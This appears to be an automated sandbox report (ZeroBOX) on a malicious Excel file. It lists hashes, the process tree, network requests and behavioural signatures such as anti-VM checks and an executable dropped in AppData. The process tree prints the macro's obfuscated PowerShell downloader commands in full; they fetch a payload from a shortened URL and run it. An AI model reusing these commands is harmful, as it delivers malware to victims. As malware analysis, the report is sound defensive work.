Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x3201	April 6, 2021, 4:38 p.m.	April 6, 2021, 4:41 p.m.

Size	56.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 21:17:44 2020, Last Saved Time/Date: Tue Sep 22 19:16:56 2020, Security: 1
MD5	`9e227b07643afd3444c4d30f0c47c3cf`
SHA256	`d3345db33851543b968f728d2a342c49dc72b0dc633da851518d8585e53af3ce`
CRC32	`62802116`
ssdeep	`1536:1XnSGiysRchNXHfA1MiWhZFGkEld+Dr7OnkdyYWptOr5TwjJ1t:1XnSGiysRchNXHfA1MiWhZFGkEld+DrS`
Yara	Microsoft_Office_Document_Zero - Microsoft Office Document Signature Zero

EXCEL.EXE "C:\Program Files\Microsoft Office\Office12\EXCEL.EXE" C:\Users\ADMINI~1\AppData\Local\Temp\9e227b07643afd3444c4d30f0c47c3cf.xls
6928
- cmd.exe cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
  3588
  - powershell.exe powershell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
    4408
- cmd.exe cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
  8008
  - powershell.exe powershell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
    3016
    - ntvdm.exe "C:\Windows\system32\ntvdm.exe" -i1
      6352

Name	Response	Post-Analysis Lookup
tinyurl.com	A 172.67.1.225 A 104.20.139.65 A 104.20.138.65	104.20.138.65

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.1.225	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameA April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameA April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW April 6, 2021, 4:08 p.m.	computer_name: WIN7-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 6, 2021, 4:08 p.m.			0	0
IsDebuggerPresent April 6, 2021, 4:08 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 116 events)

Time & API	Arguments	Status	Return
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029ec18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f0d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f198 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2021, 4:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029f398 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 6, 2021, 4:08 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://tinyurl.com/y3psaqmm
suspicious_features	GET method with no useragent header				suspicious_request	GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated

Performs some HTTP requests (2 events)

request	GET https://tinyurl.com/y3psaqmm
request	GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated

Allocates read-write-execute memory (usually to unpack itself) (50 out of 291 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 6928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x67731000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 6928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6778f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 6928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6778f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 6928 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75b41000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x60751000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x60752000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02951000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02952000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01c86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02704000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02705000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02706000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02707000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02708000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f4e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2021, 4:08 p.m.	process_identifier: 4408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\Administrator\AppData\Roaming\re.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\Administrator\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
cmdline	powershell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 6, 2021, 4:08 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (27 events)

Data received	[
Data received	W`lÔ÷ç@F0glVÀqh½vÿDOWNGRD ,o¦v4Gá[WÃ_Î6 Í\ätì¨äfÅî¬lömßîÀÿ
Data received	û
